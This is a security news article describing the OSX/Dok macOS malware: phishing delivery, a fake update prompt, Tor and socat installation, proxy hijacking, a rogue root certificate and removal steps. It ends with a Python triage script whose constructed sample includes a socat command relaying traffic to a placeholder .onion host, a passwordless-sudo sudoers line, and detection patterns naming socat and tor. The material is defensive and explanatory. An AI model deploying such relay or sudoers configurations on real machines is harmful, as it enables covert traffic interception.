A new strain of OS X malware grants attackers access to all victim communication, including messages encrypted by SSL, upon successful infection.
An attack begins when a user receives a phishing message containing the malware, known as OSX/Dok, bundled in a .zip archive called Dokument.zip. The malware bundle is named “Truesteer.AppStore.” It was signed by a “Seven Muller” on 21 April 2017 with a developer certificate that Apple had originally authenticated. According to Malwarebytes, Apple has since revoked the certificate used to sign the app, so a warning dialog box now pops up if the user attempts to unzip the archive.
If the user skirts that protective measure, a fake alert pops up claiming that the file could not be opened. Dok uses this alert as cover to copy itself to the /Users/Shared/ folder and execute from there. From that location it also adds itself to the user’s login items, so it is re-launched at the next login.
Ofer Caspi of Check Point’s malware research team explains what happens next in a blog post:
“The malicious application will then create a window on top of all other windows. This new window contains a message, claiming a security issue has been identified in the operating system, that an update is available, and that to proceed with the update, the user has to enter a password as shown in the picture below. The malware checks the system localization, and supports messages in both German and English.”
Dok wants the user to enter their password. Why? So that it can gain administrator privileges and install Homebrew, a command-line installation tool, which it then uses to install Tor and socat. Tor provides the connection to the dark web, while socat relays data between two network endpoints. At that point the malware grants the user administrator privileges and changes their network settings so that all outgoing HTTP and HTTPS connections pass through a proxy under the attacker’s control. Dok then installs a root certificate, which lets the malware perform a man-in-the-middle (MitM) attack: impersonate any website the user visits and tamper with their traffic.
Two LaunchAgents files redirect traffic to the proxy through a dark web (Tor) address. Victims should delete these files to remove the malware from their machines. They will also need to remove the rogue certificate from their System keychain and use a text editor to reverse the modifications made to the sudoers file. Finally, they can elect to remove the command-line tools, but that is not an easy process.
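The persistence and proxy changes described in the two paragraphs above are the artefacts a responder would audit. The following is an added triage helper, not Check Point's or Malwarebytes' tooling: it parses text an analyst collects from a suspect Mac (a LaunchAgent plist from ~/Library/LaunchAgents, the output of `networksetup -getwebproxy <service>`, and the sudoers file) and flags the patterns the article describes. All sample inputs are constructed, the `com.example.proxy` label and port are placeholders, and treating the sudoers edit as a NOPASSWD rule is an assumption, since the article only says the file was modified.

```python
import plistlib
import re

# Constructed sample inputs (not from the article): a LaunchAgent plist, the output of
# `networksetup -getwebproxy Wi-Fi`, and a sudoers excerpt.
SAMPLE_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.example.proxy</string>
<key>ProgramArguments</key><array>
<string>/usr/local/bin/socat</string><string>tcp4-LISTEN:5555,reuseaddr,fork</string>
<string>SOCKS4A:127.0.0.1:exampleexampleexample.onion:80,socksport=9050</string>
</array><key>RunAtLoad</key><true/></dict></plist>"""
SAMPLE_PROXY = "Enabled: Yes\nServer: 127.0.0.1\nPort: 5555\nAuthenticated Proxy Enabled: 0\n"
SAMPLE_SUDOERS = "# User privilege specification\nroot ALL=(ALL) ALL\n%admin ALL=(ALL) ALL\nalice ALL=(ALL) NOPASSWD: ALL\n"

ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b", re.I)


def launch_agent_findings(plist_bytes):
    """Flag a LaunchAgent whose program arguments point at a .onion address or invoke
    the tor/socat relay tooling Dok installs; note RunAtLoad persistence when it does."""
    plist = plistlib.loads(plist_bytes)
    args = " ".join(str(a) for a in plist.get("ProgramArguments", []))
    hits = []
    if ONION_RE.search(args):
        hits.append("references .onion address")
    for tool in ("socat", "tor"):
        if re.search(rf"(^|[/\s]){tool}(\s|$)", args):
            hits.append(f"invokes {tool}")
    if hits and plist.get("RunAtLoad"):
        hits.append("RunAtLoad persistence")
    return hits


def web_proxy_enabled(networksetup_output):
    """Parse `networksetup -getwebproxy <service>` output; return the proxy server and
    port if one is enabled so it can be compared against the expected configuration."""
    fields = dict(re.findall(r"^([\w ]+): (.+)$", networksetup_output, re.M))
    if fields.get("Enabled") != "Yes":
        return None
    return {"server": fields["Server"], "port": int(fields["Port"])}


def sudoers_nopasswd_lines(sudoers_text):
    """Return non-comment sudoers lines granting passwordless sudo (assumed form of
    Dok's edit; the article only says the file was modified)."""
    return [ln.strip() for ln in sudoers_text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#") and "NOPASSWD" in ln]


if __name__ == "__main__":
    print("LaunchAgent:", launch_agent_findings(SAMPLE_AGENT))
    print("Web proxy:", web_proxy_enabled(SAMPLE_PROXY))
    print("sudoers:", sudoers_nopasswd_lines(SAMPLE_SUDOERS))
```

A proxy that is enabled but was never configured by the organisation, together with a root certificate the user did not install, is the combination to treat as an interception setup rather than a misconfiguration.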
News of Dok comes more than a year after the security industry first encountered KeRanger, fully functional ransomware targeting OS X users.